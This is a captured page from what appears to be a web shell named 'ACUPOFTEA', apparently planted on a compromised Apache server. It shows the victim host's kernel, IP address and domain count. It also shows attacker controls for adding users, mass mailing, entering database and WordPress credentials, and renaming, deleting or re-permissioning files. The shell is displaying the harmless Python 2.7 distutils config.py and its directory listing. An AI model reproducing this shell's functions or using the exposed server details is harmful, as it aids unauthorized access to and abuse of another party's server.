System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
lib64
/
python2.7
/
distutils
/
216.73.216.141
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for accounting.gulfstore-gcc.com made by tabagkayu.
Folder Name
File Name
File Content
File
config.py
"""distutils.pypirc Provides the PyPIRCCommand class, the base class for the command classes that uses .pypirc in the distutils.command package. """ import os from ConfigParser import ConfigParser from distutils.cmd import Command DEFAULT_PYPIRC = """\ [distutils] index-servers = pypi [pypi] username:%s password:%s """ class PyPIRCCommand(Command): """Base command that knows how to handle the .pypirc file """ DEFAULT_REPOSITORY = 'https://upload.pypi.org/legacy/' DEFAULT_REALM = 'pypi' repository = None realm = None user_options = [ ('repository=', 'r', "url of repository [default: %s]" % \ DEFAULT_REPOSITORY), ('show-response', None, 'display full response text from server')] boolean_options = ['show-response'] def _get_rc_file(self): """Returns rc file path.""" return os.path.join(os.path.expanduser('~'), '.pypirc') def _store_pypirc(self, username, password): """Creates a default .pypirc file.""" rc = self._get_rc_file() f = os.fdopen(os.open(rc, os.O_CREAT | os.O_WRONLY, 0600), 'w') try: f.write(DEFAULT_PYPIRC % (username, password)) finally: f.close() def _read_pypirc(self): """Reads the .pypirc file.""" rc = self._get_rc_file() if os.path.exists(rc): self.announce('Using PyPI login from %s' % rc) repository = self.repository or self.DEFAULT_REPOSITORY config = ConfigParser() config.read(rc) sections = config.sections() if 'distutils' in sections: # let's get the list of servers index_servers = config.get('distutils', 'index-servers') _servers = [server.strip() for server in index_servers.split('\n') if server.strip() != ''] if _servers == []: # nothing set, let's try to get the default pypi if 'pypi' in sections: _servers = ['pypi'] else: # the file is not properly defined, returning # an empty dict return {} for server in _servers: current = {'server': server} current['username'] = config.get(server, 'username') # optional params for key, default in (('repository', self.DEFAULT_REPOSITORY), ('realm', self.DEFAULT_REALM), ('password', None)): if config.has_option(server, key): current[key] = config.get(server, key) else: current[key] = default if (current['server'] == repository or current['repository'] == repository): return current elif 'server-login' in sections: # old format server = 'server-login' if config.has_option(server, 'repository'): repository = config.get(server, 'repository') else: repository = self.DEFAULT_REPOSITORY return {'username': config.get(server, 'username'), 'password': config.get(server, 'password'), 'repository': repository, 'server': server, 'realm': self.DEFAULT_REALM} return {} def initialize_options(self): """Initialize options.""" self.repository = None self.realm = None self.show_response = 0 def finalize_options(self): """Finalizes options.""" if self.repository is None: self.repository = self.DEFAULT_REPOSITORY if self.realm is None: self.realm = self.DEFAULT_REALM
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2024-06-24 12:45:06
..
DIR
-
drwxr-xr-x
2024-06-24 12:45:06
command
DIR
-
drwxr-xr-x
2024-06-24 12:45:06
README
text/plain
295 B
-rw-r--r--
2024-04-10 04:58:35
__init__.py
text/plain
236 B
-rw-r--r--
2024-04-10 04:58:35
__init__.pyc
application/x-bytecode.python
415 B
-rw-r--r--
2024-04-10 04:58:46
__init__.pyo
application/x-bytecode.python
415 B
-rw-r--r--
2024-04-10 04:58:46
archive_util.py
text/plain
8.03 KB
-rw-r--r--
2024-04-10 04:58:35
archive_util.pyc
application/x-bytecode.python
7.42 KB
-rw-r--r--
2024-04-10 04:58:46
archive_util.pyo
application/x-bytecode.python
7.42 KB
-rw-r--r--
2024-04-10 04:58:46
bcppcompiler.py
text/plain
14.59 KB
-rw-r--r--
2024-04-10 04:58:35
bcppcompiler.pyc
application/x-bytecode.python
7.7 KB
-rw-r--r--
2024-04-10 04:58:46
bcppcompiler.pyo
application/x-bytecode.python
7.7 KB
-rw-r--r--
2024-04-10 04:58:46
ccompiler.py
text/plain
45.63 KB
-rw-r--r--
2024-04-10 04:58:35
ccompiler.pyc
application/x-bytecode.python
36.02 KB
-rw-r--r--
2024-04-10 04:58:46
ccompiler.pyo
application/x-bytecode.python
35.88 KB
-rw-r--r--
2024-04-10 04:58:44
cmd.py
text/plain
18.82 KB
-rw-r--r--
2024-04-10 04:58:35
cmd.pyc
application/x-bytecode.python
16.41 KB
-rw-r--r--
2024-04-10 04:58:46
cmd.pyo
application/x-bytecode.python
16.41 KB
-rw-r--r--
2024-04-10 04:58:46
config.py
text/plain
4.04 KB
-rw-r--r--
2024-04-10 04:58:35
config.pyc
application/x-bytecode.python
3.48 KB
-rw-r--r--
2024-04-10 04:58:46
config.pyo
application/x-bytecode.python
3.48 KB
-rw-r--r--
2024-04-10 04:58:46
core.py
text/plain
8.81 KB
-rw-r--r--
2024-04-10 04:58:35
core.pyc
application/x-bytecode.python
7.36 KB
-rw-r--r--
2024-04-10 04:58:46
core.pyo
application/x-bytecode.python
7.36 KB
-rw-r--r--
2024-04-10 04:58:46
cygwinccompiler.py
text/plain
17.32 KB
-rw-r--r--
2024-04-10 04:58:35
cygwinccompiler.pyc
application/x-bytecode.python
9.59 KB
-rw-r--r--
2024-04-10 04:58:46
cygwinccompiler.pyo
application/x-bytecode.python
9.59 KB
-rw-r--r--
2024-04-10 04:58:46
debug.py
text/plain
162 B
-rw-r--r--
2024-04-10 04:58:35
debug.pyc
application/x-bytecode.python
254 B
-rw-r--r--
2024-04-10 04:58:46
debug.pyo
application/x-bytecode.python
254 B
-rw-r--r--
2024-04-10 04:58:46
dep_util.py
text/plain
3.43 KB
-rw-r--r--
2024-04-10 04:58:35
dep_util.pyc
application/x-bytecode.python
3.11 KB
-rw-r--r--
2024-04-10 04:58:46
dep_util.pyo
application/x-bytecode.python
3.11 KB
-rw-r--r--
2024-04-10 04:58:46
dir_util.py
text/plain
7.68 KB
-rw-r--r--
2024-04-10 04:58:35
dir_util.pyc
application/x-bytecode.python
6.63 KB
-rw-r--r--
2024-04-10 04:58:46
dir_util.pyo
application/x-bytecode.python
6.63 KB
-rw-r--r--
2024-04-10 04:58:46
dist.py
text/plain
48.88 KB
-rw-r--r--
2024-04-10 04:58:35
dist.pyc
application/x-bytecode.python
38.26 KB
-rw-r--r--
2024-04-10 04:58:46
dist.pyo
application/x-bytecode.python
38.26 KB
-rw-r--r--
2024-04-10 04:58:46
emxccompiler.py
text/plain
11.65 KB
-rw-r--r--
2024-04-10 04:58:35
emxccompiler.pyc
application/x-bytecode.python
7.29 KB
-rw-r--r--
2024-04-10 04:58:46
emxccompiler.pyo
application/x-bytecode.python
7.29 KB
-rw-r--r--
2024-04-10 04:58:46
errors.py
text/plain
3.41 KB
-rw-r--r--
2024-04-10 04:58:35
errors.pyc
application/x-bytecode.python
6.14 KB
-rw-r--r--
2024-04-10 04:58:46
errors.pyo
application/x-bytecode.python
6.14 KB
-rw-r--r--
2024-04-10 04:58:46
extension.py
text/plain
10.65 KB
-rw-r--r--
2024-04-10 04:58:35
extension.pyc
application/x-bytecode.python
7.24 KB
-rw-r--r--
2024-04-10 04:58:46
extension.pyo
application/x-bytecode.python
7.02 KB
-rw-r--r--
2024-04-10 04:58:44
fancy_getopt.py
text/plain
17.53 KB
-rw-r--r--
2024-04-10 04:58:35
fancy_getopt.pyc
application/x-bytecode.python
11.68 KB
-rw-r--r--
2024-04-10 04:58:46
fancy_getopt.pyo
application/x-bytecode.python
11.5 KB
-rw-r--r--
2024-04-10 04:58:44
file_util.py
text/plain
7.94 KB
-rw-r--r--
2024-04-10 04:58:35
file_util.pyc
application/x-bytecode.python
6.59 KB
-rw-r--r--
2024-04-10 04:58:46
file_util.pyo
application/x-bytecode.python
6.59 KB
-rw-r--r--
2024-04-10 04:58:46
filelist.py
text/plain
12.39 KB
-rw-r--r--
2024-04-10 04:58:35
filelist.pyc
application/x-bytecode.python
10.5 KB
-rw-r--r--
2024-04-10 04:58:46
filelist.pyo
application/x-bytecode.python
10.5 KB
-rw-r--r--
2024-04-10 04:58:46
log.py
text/plain
1.65 KB
-rw-r--r--
2024-04-10 04:58:35
log.pyc
application/x-bytecode.python
2.72 KB
-rw-r--r--
2024-04-10 04:58:46
log.pyo
application/x-bytecode.python
2.72 KB
-rw-r--r--
2024-04-10 04:58:46
msvc9compiler.py
text/plain
30.28 KB
-rw-r--r--
2024-04-10 04:58:35
msvc9compiler.pyc
application/x-bytecode.python
20.99 KB
-rw-r--r--
2024-04-10 04:58:46
msvc9compiler.pyo
application/x-bytecode.python
20.92 KB
-rw-r--r--
2024-04-10 04:58:44
msvccompiler.py
text/plain
23.08 KB
-rw-r--r--
2024-04-10 04:58:35
msvccompiler.pyc
application/x-bytecode.python
17.11 KB
-rw-r--r--
2024-04-10 04:58:46
msvccompiler.pyo
application/x-bytecode.python
17.11 KB
-rw-r--r--
2024-04-10 04:58:46
spawn.py
text/plain
8.45 KB
-rw-r--r--
2024-04-10 04:58:35
spawn.pyc
application/x-bytecode.python
6.28 KB
-rw-r--r--
2024-04-10 04:58:46
spawn.pyo
application/x-bytecode.python
6.28 KB
-rw-r--r--
2024-04-10 04:58:46
sysconfig.py
text/plain
17.29 KB
-rw-r--r--
2024-04-10 04:58:41
sysconfig.py.debug-build
text/plain
17.21 KB
-rw-r--r--
2024-04-10 04:58:35
sysconfig.pyc
application/x-bytecode.python
13.09 KB
-rw-r--r--
2024-04-10 04:58:46
sysconfig.pyo
application/x-bytecode.python
13.09 KB
-rw-r--r--
2024-04-10 04:58:46
text_file.py
text/plain
12.14 KB
-rw-r--r--
2024-04-10 04:58:35
text_file.pyc
application/x-bytecode.python
9.04 KB
-rw-r--r--
2024-04-10 04:58:46
text_file.pyo
application/x-bytecode.python
9.04 KB
-rw-r--r--
2024-04-10 04:58:46
unixccompiler.py
text/plain
13.89 KB
-rw-r--r--
2024-04-10 04:58:35
unixccompiler.py.distutils-rpath
text/plain
13.36 KB
-rw-r--r--
2024-04-10 04:58:35
unixccompiler.pyc
application/x-bytecode.python
8.04 KB
-rw-r--r--
2024-04-10 04:58:46
unixccompiler.pyo
application/x-bytecode.python
8.04 KB
-rw-r--r--
2024-04-10 04:58:46
util.py
text/plain
17.81 KB
-rw-r--r--
2024-04-10 04:58:35
util.pyc
application/x-bytecode.python
14.05 KB
-rw-r--r--
2024-04-10 04:58:46
util.pyo
application/x-bytecode.python
14.05 KB
-rw-r--r--
2024-04-10 04:58:46
version.py
text/x-script.python
11.17 KB
-rw-r--r--
2024-04-10 04:58:35
version.pyc
application/x-bytecode.python
7.04 KB
-rw-r--r--
2024-04-10 04:58:46
version.pyo
application/x-bytecode.python
7.04 KB
-rw-r--r--
2024-04-10 04:58:46
versionpredicate.py
text/plain
4.98 KB
-rw-r--r--
2024-04-10 04:58:35
versionpredicate.pyc
application/x-bytecode.python
5.41 KB
-rw-r--r--
2024-04-10 04:58:46
versionpredicate.pyo
application/x-bytecode.python
5.41 KB
-rw-r--r--
2024-04-10 04:58:46
~ ACUPOFTEA - accounting.gulfstore-gcc.com